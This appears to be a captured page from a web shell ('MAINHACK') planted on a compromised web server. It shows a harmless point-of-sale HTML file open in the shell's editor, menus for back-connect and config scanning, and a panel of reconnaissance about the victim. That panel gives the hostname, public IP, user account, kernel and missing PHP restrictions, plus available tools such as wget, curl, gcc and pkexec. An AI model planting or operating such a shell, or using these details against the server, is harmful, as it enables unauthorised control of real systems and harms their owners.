[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: quicksales.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Quick Sale</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; min-height: 100vh; display: flex; justify-content: center; background-color: #f4f4f4; } .container { display: flex; flex-direction: column; width: 100%; max-width: 1200px; margin: 20px; } .header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding: 10px; background-color: #fff; box-shadow: 0 2px 4px rgba(0,0,0,0.1); } .header h2 { margin: 0; color: #1a0dab; } .header button { background-color: #ffeb3b; border: none; padding: 5px 10px; cursor: pointer; border-radius: 5px; } .customer-info { display: flex; align-items: center; margin-bottom: 20px; padding: 10px; background-color: #fff; box-shadow: 0 2px 4px rgba(0,0,0,0.1); } .customer-info input { margin-right: 10px; padding: 5px; flex: 1; } table { width: 100%; border-collapse: collapse; margin-bottom: 20px; background-color: #fff; box-shadow: 0 2px 4px rgba(0,0,0,0.1); } table, th, td { border: 1px solid #ddd; } th, td { padding: 8px; text-align: left; } .add-items, .discounts-offers { margin-bottom: 20px; padding: 10px; background-color: #fff; box-shadow: 0 2px 4px rgba(0,0,0,0.1); } .add-items span, .discounts-offers span { margin-right: 10px; background-color: #ffeb3b; padding: 2px 5px; border-radius: 3px; } .discounts-offers input { margin-right: 10px; padding: 5px; } .right-panel { padding: 20px; background-color: #fff; box-shadow: 0 2px 4px rgba(0,0,0,0.1); margin-top: 20px; } .right-panel h3 { color: #1a0dab; margin-top: 0; } .right-panel button { background-color: #007bff; color: white; border: none; padding: 10px 20px; cursor: pointer; border-radius: 5px; margin-right: 10px; } .right-panel button.reset { background-color: #6c757d; } @media (min-width: 768px) { .container { flex-direction: row; } .right-panel { margin-top: 0; margin-left: 20px; } } </style> </head> <body> <div class="container"> <div class="left-panel"> <div class="header"> <h2>Quick Sale</h2> <button>Switch to old quick sale</button> </div> <div class="customer-info"> <input type="text" placeholder="Customer* +233 Search by mobile/name/customer id"> <input type="date" value="2025-07-20"> </div> <table> <tr> <th>Service *</th> <th>Staff *</th> <th>Qty.</th> <th>Price (GHC)</th> <th>Disc. (%)</th> <th>Total (GHC)</th> </tr> <tr> <td><select><option>Select service</option></select></td> <td><input type="text" value="Select Staff" style="border: none; background: #ffebee;"></td> <td><input type="number" value="1" style="width: 50px;"></td> <td><input type="number" value="0" style="width: 80px;"></td> <td><input type="number" value="0" style="width: 80px;"></td> <td>0.00</td> </tr> </table> <div class="discounts-offers"> <span>Disc. by Value</span> <input type="number" value="0" style="width: 80px;"> <span>Disc. by Percentage</span> <input type="number" value="0" style="width: 80px;"> % <span>Redeem Gift Voucher</span> <input type="text" value="Eg: YKLVJDMZ" style="width: 100px;"> </div> </div> <div class="right-panel"> <h3>Billing Summary</h3> <p>Sub Total: GHC 0.00</p> <p>Grand Total: GHC 0.00</p> <button>Add Tip</button> <p>Change GHC 0.00</p> <p>Remarks</p> <p>Payable Amount GHC 0</p> <p>Cash <input type="number" value="0" style="width: 80px;"></p> <p>Card <input type="number" value="0" style="width: 80px;"></p> <button>Checkout</button> <button class="reset">Reset</button> </div> </div> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.79 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002